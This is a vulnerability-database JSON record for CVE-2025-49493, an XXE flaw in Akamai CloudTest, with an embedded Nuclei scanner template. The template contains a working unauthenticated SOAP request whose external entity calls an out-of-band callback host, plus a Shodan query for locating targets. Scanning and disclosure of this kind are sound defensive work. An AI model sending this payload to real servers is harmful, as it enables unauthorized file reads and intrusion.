{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-49493/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-49493/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-49493/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-49493/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-49493/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-49493"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-49493"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2025/CVE-2025-49493.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2025-49493\n\ninfo:\n  name: Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)\n  author: xbow,3th1c_yuk1\n  severity: critical\n  description: |\n    Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.\n  impact: |\n    Unauthenticated attackers can exploit XXE injection to read arbitrary files from the server through malicious XML entities in SOAP requests.\n  remediation: |\n    Upgrade Akamai CloudTest to version 60 2025.06.02 (12988) or later that properly disables external entity processing.\n  reference:\n    - https://xbow.com/blog/xbow-akamai-cloudtest-xxe/\n    - https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-49493\n  classification:\n    epss-score: 0.02377\n    epss-percentile: 0.83134\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\n    cvss-score: 9.1\n    cve-id: CVE-2025-49493\n    cwe-id: CWE-611\n    cpe: cpe:2.3:a:akamai:cloudtest:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"Akamai CloudTest\"\n    vendor: akamai\n    product: cloudtest\n  tags: cve,cve2025,akamai,cloudtest,xxe,oast,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /concerto/services/RepositoryService HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/html\n        SOAPAction: \"\"\n\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <!DOCTYPE soapenv:Envelope [\n          <!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">\n        ]>\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\n                          xmlns:rep=\"http://example.com/services/repository\">\n           <soapenv:Header/>\n           <soapenv:Body>\n              <rep:getUIBundleObjectXml>\n                 <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>\n              </rep:getUIBundleObjectXml>\n           </soapenv:Body>\n        </soapenv:Envelope>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'contains(content_type, \"text/xml\")'\n          - 'contains(body, \"XML stream\")'\n        condition: and\n# digest: 4a0a00473045022069e46fd5cb1a8b00fa37e4878e9ce0196846edc0ee096058b0bf81db66eaa53c022100cf4103db8362bd445a383f462773ec5efd6de05bbe829ddfb762e8d3d92ecd3a:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2025-49493"
}